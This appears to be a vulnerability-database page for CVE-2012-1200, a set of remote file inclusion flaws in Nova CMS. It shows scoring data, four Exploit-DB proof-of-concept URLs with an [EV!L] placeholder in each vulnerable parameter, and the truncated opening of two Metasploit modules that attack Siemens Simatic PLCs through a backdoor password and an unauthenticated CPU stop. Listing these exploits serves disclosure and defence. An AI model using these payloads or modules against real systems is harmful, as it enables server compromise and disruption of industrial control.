CVE-2012-1200
published 2012-02-18CVE-2012-1200: Multiple PHP remote file inclusion vulnerabilities in Nova CMS allow remote attackers to execute arbitrary PHP code via a URL in the (1) fileType parameter to…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.75%
84.4th percentile
Multiple PHP remote file inclusion vulnerabilities in Nova CMS allow remote attackers to execute arbitrary PHP code via a URL in the (1) fileType parameter to optimizer/index.php, (2) id parameter to administrator/modules/moduleslist.php, (3) filename parameter to includes/function/gets.php, or (4) conf[blockfile] parameter to includes/function/usertpl.php.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)
exploitdb·2012-07-14
Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)
Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)
---
# Exploit Title: Siemens Simatic S7 300 Remote Memory Viewer Backdoor
# Date: 7-13-2012
# Exploit Author: Dillon Beresford
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1200 PLC
# CVE : None
require 'msf/core'
class Metasploit3 'Siemens Simatic S7-300 PLC Remote Memory Viewer',
'Description' => %q{ This module attempts to authenticate using a hard-coded backdoor password in
the Simatic S7-300 PLC and dumps the device memory using system commands.
Mode: Values 8, 16 or 32 bit access
Valid address areas are:
80000000 - 81FFFFFF SD-Ram cached
A0000000 - A1FFFFFF SD-Ram uncached
A8000000 - A87FFFFF Norflash
AFC00000 - AFC7FFFF ED-Ram int. uncached
BFE00000 - BFEFFFFD COM-ED-Ram ext.
C0000000 - C
Exploit-DB
Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)
exploitdb·2012-07-14
Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)
Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)
---
# Exploit Title: Siemens Simatic S7 1200 CPU command module
# Date: 7-13-2012
# Exploit Author: Dillon Beresford
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1200 PLC
# CVE : None
require 'msf/core'
class Metasploit3 'Siemens Simatic S7-1200 CPU START/STOP Module',
'Description' => %q{
The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP
this modules allows an attacker to perform administrative commands without authentication.
This module allows a remote user to change the state of the PLC between
STOP and START, allowing an attacker to end process control by the PLC.
},
'Author' => 'Dillon Beresford',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.us-ce
Exploit-DB
Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion
Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L]
Exploit-DB
Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion
Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/optimizer/index.php?fileType=[EV!L]
Exploit-DB
Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion
Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L]
Exploit-DB
Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion
Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L]
No writeups or analysis indexed.
http://packetstormsecurity.org/files/109669/Nova-CMS-Remote-File-Inclusion.htmlhttp://www.securityfocus.com/bid/51976https://exchange.xforce.ibmcloud.com/vulnerabilities/73159http://packetstormsecurity.org/files/109669/Nova-CMS-Remote-File-Inclusion.htmlhttp://www.securityfocus.com/bid/51976https://exchange.xforce.ibmcloud.com/vulnerabilities/73159
2012-02-18
Published